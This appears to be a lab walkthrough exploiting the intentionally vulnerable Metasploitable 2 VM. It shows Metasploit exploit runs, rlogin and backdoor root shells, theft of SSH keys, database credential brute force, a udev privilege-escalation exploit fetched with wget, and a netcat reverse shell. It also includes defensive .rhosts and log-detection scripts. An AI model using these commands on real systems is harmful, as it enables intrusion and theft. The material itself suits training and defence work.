whoami
root

Below is a video demonstrating this Metasploit shell exploit:

Metasploitable 2: Remote Access Ports 512, 513 & 514

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
512/tcp   open  exec?
513/tcp   open  login
514/tcp   open  tcpwrapped

All of these ports are running “r” services, which here have been configured to allow remote access from any host: a poor configuration.

Looking at the Nessus report is very revealing regarding port 514:

Port 514/tcp

rsh Unauthenticated Access (via finger Information)

Synopsis

It was possible to log on this machine without password.

Description

Using common usernames as well as the usernames reported by ‘finger’, Nessus was able to log in through rsh. Either the accounts are not protected by passwords or the ~/.rhosts files are not configured properly.

This vulnerability is confirmed to exist in Cisco Prime LAN Management Solution, but could be present on any host that is not securely configured.

Solution

If the remote host is a Cisco Prime LAN Management Solution virtual appliance, apply the relevant patch referenced in Cisco security advisory cisco-sa-20130109-lms.

Otherwise, remove the .rhosts files or set a password on the impacted accounts.

Risk Factor

Critical

Ports - tcp/514

It was possible to log into this host using the account ‘root’.
Here is the output of the ‘id’ command :
uid=0(root) gid=0(root) groups=0(root)

It was possible to log into this host using the account ‘bin’.
Here is the output of the ‘id’ command :
uid=2(bin) gid=2(bin) groups=2(bin)

It was possible to log into this host using the account ‘daemon’.
Here is the output of the ‘id’ command :
uid=1(daemon) gid=1(daemon) groups=1(daemon)

It was possible to log into this host using the account ‘nobody’.
Here is the output of the ‘id’ command :
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

It was possible to log into this host using the account ‘postgres’.
Here is the output of the ‘id’ command :
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)

This port is wide open.

In order to exploit these misconfigured, vulnerable remote access services we must ensure that we have “rsh-client” installed on the attacking machine, which we can achieve via the Terminal with the apt-get install command. Once we have this the exploit could not be simpler:

:~# rlogin -l root 192.168.1.103
Last login: Tue Nov 12 16:59:44 EST 2013 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have mail.
root@metasploitable:~#

Simple as that!
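Nessus's remediation above points at the ~/.rhosts files. The Python below is an added example (not from the post) that audits .rhosts contents for the wildcard and netgroup entries that grant password-less rlogin/rsh access; SAMPLE_RHOSTS is a constructed set of files, not the target's.

```python
# Constructed .rhosts contents, not copied from the target.  The first entry
# is the classic "trust everyone" line; the others show the finer-grained
# forms hosts.equiv(5) allows.
SAMPLE_RHOSTS = {
    "/root/.rhosts": "+ +\n",
    "/home/msfadmin/.rhosts": "+\n",
    "/home/ops/.rhosts": (
        "build01.corp.example ops\n"
        "-badhost.corp.example\n"
        "+@buildfarm\n"
        "build02.corp.example +\n"
    ),
}

SEVERITY = {"critical": 3, "high": 2, "medium": 1}


def audit_rhosts(path, text):
    """Return (path, line_no, severity, message) for every entry that grants
    password-less trust beyond a single named host and user."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        # '-host' or '-user' entries deny access; nothing to report.
        if host.startswith("-") or (user is not None and user.startswith("-")):
            continue
        if host == "+" and user == "+":
            findings.append((path, line_no, "critical",
                             "any user on any host may log in without a password"))
        elif host == "+":
            findings.append((path, line_no, "high",
                             "any host is trusted for %s" % (user or "the same username")))
        elif user == "+":
            findings.append((path, line_no, "high",
                             "every user on %s is trusted" % host))
        elif host.lstrip("+").startswith("@") or (user or "").startswith("@"):
            findings.append((path, line_no, "medium",
                             "trust delegated to a netgroup: %s" % line))
    return findings


def worst_severity(findings):
    """Highest severity among findings, or None when the files are clean."""
    if not findings:
        return None
    return max((f[2] for f in findings), key=SEVERITY.get)


if __name__ == "__main__":
    results = []
    for path, text in SAMPLE_RHOSTS.items():
        results.extend(audit_rhosts(path, text))
    for finding in results:
        print("%s:%d [%s] %s" % finding)
    print("worst:", worst_severity(results))
```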

Metasploitable 2: Java RMI (Remote Method Invocation) Server

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
1099/tcp  open  rmiregistry GNU Classpath grmiregistry

From Wiki:

The Java Remote Method Invocation (Java RMI) is a Java API that performs the object-oriented equivalent of remote procedure calls (RPC), with support for direct transfer of serialized Java objects and distributed garbage collection.

OK, let’s have a look in Metasploit:

msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    1099             yes       The target port
SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  8080             yes       The local port to listen on.
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

Id  Name
--  ----
0   Generic (Java Payload)

msf exploit(java_rmi_server) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(java_rmi_server) > exploit

[*] Started reverse handler on 192.168.1.78:4444
[*] Using URL: http://0.0.0.0:8080/02Bwa0tNBOFx
[*]  Local IP: http://192.168.1.70:8080/02Bwa0tNBOFx
[*] Connected and sending request for http://192.168.1.78:8080/02Bwa0tNBOFx/apQlsfJd.jar
[*] 192.168.1.103    java_rmi_server - Replied to request for payload JAR
[*] Sending stage (30355 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.78:4444 -> 192.168.1.103:54392) at 2013-11-13 09:19:06 +0000
[+] Target 192.168.1.103:1099 may be exploitable...
[*] Server stopped.

meterpreter >

Below is a video demonstrating the above exploit.

Metasploitable 2: Port 1524 ingreslock Backdoor

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
1524/tcp  open  ingreslock?

The ingreslock port was a popular place to plant a backdoor on a compromised server.

The Nessus report had this to say on port 1524:

1524/tcp

Rogue Shell Backdoor Detection

Synopsis

The remote host may have been compromised.

Description

A shell is listening on the remote port, without any authentication. An attacker may use it by connecting to the remote port and sending commands directly.

And so we can test the backdoor connection in the attacking Terminal:

:~# telnet 192.168.1.103 1524
Trying 192.168.1.103...
Connected to 192.168.1.103.
Escape character is '^]'.
root@metasploitable:/#

Very simple.

Metasploitable 2: Port 2121 – ProFTPD 1.3.1

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
2121/tcp  open  ftp         ProFTPD 1.3.1

The Nessus report on Port 2121 had this to say:

2121/tcp

FTP Supports Clear Text Authentication

Synopsis

Authentication credentials might be intercepted.

Description

The remote FTP server allows the user’s name and password to be transmitted in clear text, which could be intercepted by a network sniffer or a man-in-the-middle attack.

In truth none of this information helped me and I was unable to find a Metasploit exploit that related to version 1.3.1. Attacks on other versions were available.

I had a look for exploits in the wild, but again, couldn’t figure out their application.

Most of the guidance online talks of using a password cracking tool for this ftp service; however, I’m going to skip that and presume that within the context of previous exploits we have already enumerated user names and passwords.

So, let’s log in via the attacking Terminal, using the credentials msfadmin/msfadmin for username/password:

~# ftp 192.168.1.103 2121
Connected to 192.168.1.103.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.1.103]
Name (192.168.1.103:root): msfadmin
331 Password required for msfadmin
Password:
230 User msfadmin logged in
Remote system type is UNIX.
Using binary mode to transfer files.

Then we can have a look at files:

ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwx------   2 msfadmin msfadmin     4096 Nov 14 11:25 .gconfd
drwx------   2 msfadmin msfadmin     4096 Nov 14 11:25 .gconf
drwxr-xr-x   7 msfadmin msfadmin     4096 Nov 13 11:25 .
-rwx------   1 msfadmin msfadmin        4 May 20  2012 .rhosts
-rw-------   1 root     root         4174 May 14  2012 .mysql_history
lrwxrwxrwx   1 root     root            9 May 14  2012 .bash_history -> /dev/null
drwx------   2 msfadmin msfadmin     4096 May 18  2010 .ssh
-rw-r--r--   1 msfadmin msfadmin        0 May  7  2010 .sudo_as_admin_successful
drwxr-xr-x   6 msfadmin msfadmin     4096 Apr 28  2010 vulnerable
drwxr-xr-x   4 msfadmin msfadmin     4096 Apr 17  2010 .distcc
drwxr-xr-x   6 root     root         4096 Apr 16  2010 ..
-rw-r--r--   1 msfadmin msfadmin      586 Mar 16  2010 .profile
226 Transfer complete

And download some files for further investigation:

ftp> get .bash_history
local: .bash_history remote: .bash_history
200 PORT command successful
550 .bash_history: Not a regular file
ftp> get .profile
local: .profile remote: .profile
200 PORT command successful
150 Opening BINARY mode data connection for .profile (586 bytes)
226 Transfer complete
586 bytes received in 0.01 secs (89.9 kB/s)

We can navigate to .ssh and look for files:

ftp> cd .ssh
250 CWD command successful
ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   7 msfadmin msfadmin     4096 Nov 13 11:25 ..
drwx------   2 msfadmin msfadmin     4096 May 18  2010 .
-rw-------   1 msfadmin msfadmin     1675 May 18  2010 id_rsa
-rw-r--r--   1 msfadmin msfadmin      405 May 18  2010 id_rsa.pub
-rw-r--r--   1 msfadmin msfadmin      609 May  7  2010 authorized_keys
226 Transfer complete

And then download the key pair:

ftp> get id_rsa
local: id_rsa remote: id_rsa
200 PORT command successful
150 Opening BINARY mode data connection for id_rsa (1675 bytes)
226 Transfer complete
1675 bytes received in 0.02 secs (88.6 kB/s)
ftp> get id_rsa.pub
local: id_rsa.pub remote: id_rsa.pub
200 PORT command successful
150 Opening BINARY mode data connection for id_rsa.pub (405 bytes)
226 Transfer complete
405 bytes received in 0.00 secs (275.4 kB/s)
ftp>

Hat-tip to the iPositive Security Blog who concludes with:

The user has Read/Write privileges using FTP service. Even though these users are non-root accounts, and have RW privs in their home directories, we have gained a foothold into the target. This is also applicable to other system / network services such as samba [ file sharing ] or ssh [ remote access ]. Using these accounts, it is now possible for us to explore the file system, configuration(s), set up, any specific software(s) / applications that are installed and may be vulnerable. Also a good idea is to upload backdoor / malware / trojan / privilege escalation exploit(s) on the server. The expectation is to wait for some user, usually root or root privileged user, to access these malicious exes and run them. Once the exe runs, depending upon its function, a variety of actions can be performed. Actions can include and are not limited to gaining shell, execute commands, sniff sensitive data off the wire and send the logs to the attacker, enumerate other systems in the network environment for further exploitation etc, and many more.

Metasploitable 2: Port 3306 MySQL

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5

The Nessus report on this port was very revealing; here is some of the information:

3306/tcp

MySQL Unpassworded Account Check

Synopsis

The remote database server can be accessed without a password.

Description

It is possible to connect to the remote MySQL database server using an unpassworded account. This may allow an attacker to launch further attacks against the database.

The ‘root’ account does not have a password.

Here is the list of databases on the remote server :

- information_schema
- dvwa
- metasploit
- mysql
- owasp10
- tikiwiki
- tikiwiki195

Version : 5.0.51a-3ubuntu5
Protocol : 10
Server Status : SERVER_STATUS_AUTOCOMMIT
Server Capabilities :
CLIENT_LONG_FLAG (Get all column flags)
CLIENT_CONNECT_WITH_DB (One can specify db on connect)
CLIENT_COMPRESS (Can use compression protocol)
CLIENT_PROTOCOL_41 (New 4.1 protocol)
CLIENT_SSL (Switch to SSL after handshake)
CLIENT_TRANSACTIONS (Client knows about transactions)
CLIENT_SECURE_CONNECTION (New 4.1 authentication)

The ‘root’ account does not have a password! So, let’s see if we can connect to the SQL database with the username root and a blank password.

~# mysql -h 192.168.1.103 -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

And there we have the database connection. Let’s have a look at the databases:

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.01 sec)

Let’s choose mysql database and have a look at the tables:

mysql> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| columns_priv              |
| db                        |
| func                      |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| proc                      |
| procs_priv                |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
17 rows in set (0.00 sec)

Let’s have a look at users and their passwords:

mysql> select User, Password from user;
+------------------+----------+
| User             | Password |
+------------------+----------+
| debian-sys-maint |          |
| root             |          |
| guest            |          |
+------------------+----------+
3 rows in set (0.00 sec)

mysql>

So, three accounts without passwords that we can use.
Let’s have a look at the tables within another database:

mysql> show tables from owasp10;
+-------------------+
| Tables_in_owasp10 |
+-------------------+
| accounts          |
| blogs_table       |
| captured_data     |
| credit_cards      |
| hitlog            |
| pen_test_tools    |
+-------------------+
6 rows in set (0.01 sec)

We’ll change database and have a look at credit card details:

mysql> use owasp10
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from credit_cards;
+------+------------------+-----+------------+
| ccid | ccnumber         | ccv | expiration |
+------+------------------+-----+------------+
|    1 | 4444111122223333 | 745 | 2012-03-01 |
|    2 | 7746536337776330 | 722 | 2015-04-01 |
|    3 | 8242325748474749 | 461 | 2016-03-01 |
|    4 | 7725653200487633 | 230 | 2017-06-01 |
|    5 | 1234567812345678 | 627 | 2018-11-01 |
+------+------------------+-----+------------+
5 rows in set (0.03 sec)
mysql>

Hat-tip to PentestLab for the MySQL post-exploitation.

Below is a SecurityTube video obtaining a root shell via Metasploit:

Metasploitable 2: Port 3632 distccd Exploit and Privilege Escalation


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
3632/tcp  open  distccd?

What is distccd?

Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. distcc should always generate the same results as a local build, is simple to install and use, and is usually much faster than a local compile.

OK, time to search Metasploit:

msf > search distccd
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                           Disclosure Date  Rank       Description
   ----                           ---------------  ----       -----------
   exploit/unix/misc/distcc_exec  2002-02-01       excellent  DistCC Daemon Command Execution

Let’s run the exploit:

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3632             yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(distcc_exec) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo i5VOR5zoE9EvGttx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "i5VOR5zoE9EvGttx\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:46436) at 2013-11-19 10:59:04 +0000

whoami
daemon

As we can see from the “whoami”, we have a shell, but only as the daemon user.

Now we will escalate our privileges from daemon to root using the udev (< 141) local privilege escalation exploit.

Firstly we get the exploit:

wget http://www.exploit-db.com/download/8572
--02:23:28--  http://www.exploit-db.com/download/8572
           => `8572'
Resolving www.exploit-db.com... 23.23.129.3, 23.23.150.193
Connecting to www.exploit-db.com|23.23.129.3|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/8572/ [following]
--02:23:29--  http://www.exploit-db.com/download/8572/
           => `index.html'
Reusing existing connection to www.exploit-db.com:80.
HTTP request sent, awaiting response... 200 OK
Length: 2,768 (2.7K) [application/txt]

    0K ..                                                    100%  414.77 KB/s

02:23:30 (414.77 KB/s) - `index.html' saved [2768/2768]

mv index.html exploit.c
gcc exploit.c -o exploit

The exploit instructions are:

Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].

The exploit will execute /tmp/run as root so throw whatever payload you want in there.

Put simply, we must find the PID of udevd and subtract 1:

pgrep udevd
3125

Now we need to open Netcat in a new Terminal in port listening mode:

:~# nc -vlp 12345
listening on [any] 12345 ...

Now to the exploit. (Note that the second line contains your attacking IP and the Netcat port, and the third line is the PID minus one.)

echo "#!/bin/sh" > /tmp/run
echo "nc -e /bin/sh 192.168.1.78 12345" >> /tmp/run
./exploit 3124

And our Netcat listener should come alive:

192.168.1.103: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.78] from (UNKNOWN) [192.168.1.103] 55574
whoami
root

And as you can see we are root!

Metasploitable 2: Port 5432 – PostgreSQL


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7

This one is a straightforward brute force of the login using Metasploit:

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(postgres_login) > run

[*] 192.168.1.103:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'postgres':''
[-] 192.168.1.103:5432 Postgres - [01/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: '':''
[-] 192.168.1.103:5432 Postgres - [02/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'scott':''
[-] 192.168.1.103:5432 Postgres - [03/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'admin':''
[-] 192.168.1.103:5432 Postgres - [04/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.1.103:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.103:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)

And there we have it; the username and password are both postgres.
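As an added defender-side example (not part of the original post), here is a small Python detector for the trace the postgres_login scanner leaves in the PostgreSQL server log: a burst of password failures across several usernames from one host, possibly followed by a successful login with the guessed password. The sample log lines are constructed and assume log_line_prefix = '%t [%p] %r ' so that the remote host appears on every line.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log; assumes log_line_prefix = '%t [%p] %r ' (time, pid, remote host(port)).
SAMPLE_LOG = """\
2013-11-20 08:03:50 GMT [4311] 192.168.1.78(51002) FATAL:  password authentication failed for user "postgres"
2013-11-20 08:03:50 GMT [4312] 192.168.1.78(51003) FATAL:  password authentication failed for user ""
2013-11-20 08:03:51 GMT [4313] 192.168.1.78(51004) FATAL:  password authentication failed for user "scott"
2013-11-20 08:03:51 GMT [4314] 192.168.1.78(51005) FATAL:  password authentication failed for user "admin"
2013-11-20 08:03:52 GMT [4315] 192.168.1.78(51006) LOG:  connection authorized: user=postgres database=template1
2013-11-20 08:10:00 GMT [4400] 192.168.1.50(40001) FATAL:  password authentication failed for user "app"
"""

LINE_RE = re.compile(r'^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) \S+ \[\d+\] '
                     r'(?P<host>[\d.]+)\(\d+\) (?:FATAL|LOG):\s+(?P<msg>.*)$')
FAIL_RE = re.compile(r'password authentication failed for user "(?P<user>[^"]*)"')
OK_RE = re.compile(r'connection authorized: user=(?P<user>\S+)')

def parse(log_text):
    """Yield (timestamp, host, kind, user) for authentication lines; kind is 'fail' or 'ok'."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed prefix format
        ts = datetime.strptime(m['ts'], '%Y-%m-%d %H:%M:%S')
        for kind, pattern in (('fail', FAIL_RE), ('ok', OK_RE)):
            hit = pattern.search(m['msg'])
            if hit:
                yield ts, m['host'], kind, hit['user']
                break

def detect_bruteforce(log_text, threshold=3, window=timedelta(seconds=60)):
    """Flag hosts with >= threshold failures inside one sliding window; note any success after the burst."""
    events = defaultdict(list)
    for ts, host, kind, user in parse(log_text):
        events[host].append((ts, kind, user))
    alerts = {}
    for host, evs in events.items():
        evs.sort()
        fails = [(ts, user) for ts, kind, user in evs if kind == 'fail']
        for i, (start, _) in enumerate(fails):
            burst = [u for ts, u in fails[i:] if ts - start <= window]  # failures inside the window
            if len(burst) >= threshold:
                last_fail = fails[i + len(burst) - 1][0]
                alerts[host] = {'failures': len(burst), 'users': sorted(set(burst)),
                                'success_after_failures': any(k == 'ok' and ts >= last_fail for ts, k, _ in evs)}
                break
    return alerts
```

Against the constructed log the scanning host is flagged with four failures over four usernames and a success immediately afterwards, while the single failure from the other host is ignored.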

So let’s connect via the postgres client in the Terminal:

# psql -h 192.168.1.103 -U postgres -W
Password for user postgres: 
psql (9.1.9, server 8.3.1)
WARNING: psql version 9.1, server version 8.3.
         Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.

postgres=# \l
                    List of databases
   Name    |  Owner   | Encoding |   Access privileges   
-----------+----------+----------+-----------------------
 postgres  | postgres | UTF8     | 
 template0 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
 template1 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
(3 rows)

postgres=#

Below is a video demonstrating the above with additional post-exploitation manoeuvres:

Now that we have the password, we can also use Metasploit to obtain a Meterpreter shell:

msf > use exploit/linux/postgres/postgres_payload
msf exploit(postgres_payload) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RHOST     192.168.1.103    yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(postgres_payload) > set PASSWORD postgres
PASSWORD => postgres
msf exploit(postgres_payload) > set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
msf exploit(postgres_payload) > exploit

[*] Started bind handler
[*] 192.168.1.103:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/fTDEMbhY.so, should be cleaned up automatically
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.78:49575 -> 192.168.1.103:4444) at 2013-11-20 08:04:41 +0000

meterpreter >

Metasploitable 2: Port 5900 – VNC


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
5900/tcp  open  vnc         VNC (protocol 3.3)

The information online pertaining to exploiting this VNC service all uses brute force techniques; however, the Nessus output for this port is revealing:

Port 5900/tcp
VNC Server ‘password’ Password

Synopsis
A VNC server running on the remote host is secured with a weak password.

Description
The VNC server running on the remote host is secured with a weak password. Nessus was able to login using VNC authentication and a password of ‘password’. A remote, unauthenticated attacker could exploit this to take control of the system.

Solution
Secure the VNC service with a strong password.

Risk Factor
Critical

CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

Plugin Information:
Publication date: 2012/08/29, Modification date: 2012/08/29

Ports
tcp/5900

Nessus logged in using a password of “password”.

As we can see, Nessus has done all the hard work, discovering that the VNC password is “password”.

All that’s left for us to do is log in to the VNC service from the attacking Terminal:

# vncviewer 192.168.1.103
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

And up pops the virtual desktop:

metasploitable_vnc
